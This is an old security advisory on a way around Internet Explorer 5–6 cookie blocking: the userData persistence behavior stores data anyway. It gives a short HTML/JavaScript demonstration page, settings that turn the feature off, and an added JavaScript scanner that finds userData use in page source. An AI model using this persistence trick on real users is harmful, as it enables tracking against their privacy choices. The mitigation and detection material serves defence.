COMMAND

IE cookie restrictions bypassed via active scripting

SYSTEMS AFFECTED

Internet Explorer 5
Internet Explorer 5.5
Internet Explorer 6

PROBLEM

From Jelmer's advisory [http://www.xs4all.nl/~jkuperus]:

Bypassing cookie restrictions in IE 5+6

Demonstration
=============

First disable cookies by (on IE6 at least this is the way to do it) going to Tools > Privacy, then set it to block all. Go to http://www.xs4all.nl/~jkuperus/cookies.htm for an example: enter a value, press Save, close the browser, reopen the page and press Load; the value is preserved.

    <html>
    <head>
    <style>
    /* Attach IE's userData persistence behavior to elements of this class */
    .storeuserData {behavior:url(#default#userData);}
    </style>
    <script>
    // Copy the input's value into a persistent attribute and write the store
    function fnSaveInput(){
        var oPersist=oPersistForm.oPersistInput;
        oPersist.setAttribute("sPersist",oPersist.value);
        oPersist.save("oXMLBranch");
    }
    // Read the store back and restore the value saved in an earlier session
    function fnLoadInput(){
        var oPersist=oPersistForm.oPersistInput;
        oPersist.load("oXMLBranch");
        oPersist.value=oPersist.getAttribute("sPersist");
    }
    </script>
    </head>
    <body>
    <form ID="oPersistForm">
    <input CLASS="storeuserData" TYPE="text" ID="oPersistInput">
    <input TYPE="button" VALUE="Load" onclick="fnLoadInput()">
    <input TYPE="button" VALUE="Save" onclick="fnSaveInput()">
    </form>
    </body>
    </html>

SOLUTION

Disable active scripting, or turn off userdata persistence in the security zone, which turns off userdata completely:

    Tools | Internet Options
    Security tab
    Custom Level button
    <last option in Miscellaneous> Userdata persistence
    <set to> Disable
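
To check whether a given page relies on this storage path, the following added example (not part of Jelmer's advisory) statically scans page source for the userData behavior, the elements it is attached to, and the store names passed to save() and load(). The function name, the SAMPLE input and the inline-style span in it are constructed for illustration.

```javascript
// Added example: static check for IE userData persistence in page source.
// SAMPLE is constructed from the advisory's demo; the <span> with an inline
// style is an extra constructed case. Function names are hypothetical.
const SAMPLE = `<html><head>
<style>.storeuserData {behavior:url(#default#userData);}</style>
<script>
function fnSaveInput(){ var o=oPersistForm.oPersistInput;
  o.setAttribute("sPersist",o.value); o.save("oXMLBranch"); }
function fnLoadInput(){ var o=oPersistForm.oPersistInput;
  o.load("oXMLBranch"); o.value=o.getAttribute("sPersist"); }
</script></head><body><form ID="oPersistForm">
<input CLASS="storeuserData" TYPE="text" ID="oPersistInput">
<span style="BEHAVIOR: url('#default#userdata')" id="inlineStore"></span>
</form></body></html>`;

// Matches the behavior declaration regardless of case, spacing or quoting.
const BEHAVIOR = /behavior\s*:\s*url\(\s*['"]?#default#userdata['"]?\s*\)/i;

function findUserDataPersistence(html) {
  const classes = new Set();
  // 1. CSS rules whose declaration block attaches the userData behavior.
  for (const m of html.matchAll(/([^{}<>]+)\{([^}]*)\}/g)) {
    if (!BEHAVIOR.test(m[2])) continue;
    for (const c of m[1].matchAll(/\.([\w-]+)/g)) classes.add(c[1].toLowerCase());
  }
  // 2. Elements carrying one of those classes, or the behavior in an inline style.
  const elements = [];
  for (const m of html.matchAll(/<(\w+)\b([^>]*)>/g)) {
    const attrs = m[2];
    const cls = /\bclass\s*=\s*["']?([^"'>]+)/i.exec(attrs);
    const viaClass = cls && cls[1].split(/\s+/).some(c => classes.has(c.toLowerCase()));
    const inline = /\bstyle\s*=/i.test(attrs) && BEHAVIOR.test(attrs);
    if (!viaClass && !inline) continue;
    const id = /\bid\s*=\s*["']?([\w-]+)/i.exec(attrs);
    elements.push({ tag: m[1].toLowerCase(), id: id ? id[1] : null });
  }
  // 3. Store names passed to save()/load(), the calls that write and read the data.
  const stores = new Set();
  for (const m of html.matchAll(/\.(?:save|load)\(\s*["']([^"']+)["']\s*\)/g)) stores.add(m[1]);
  return { classes: [...classes], elements, stores: [...stores] };
}

console.log(JSON.stringify(findUserDataPersistence(SAMPLE), null, 2));
```

A page with no hits in any of the three lists does not use this storage path; the scan is textual, so markup generated at run time by script is not covered.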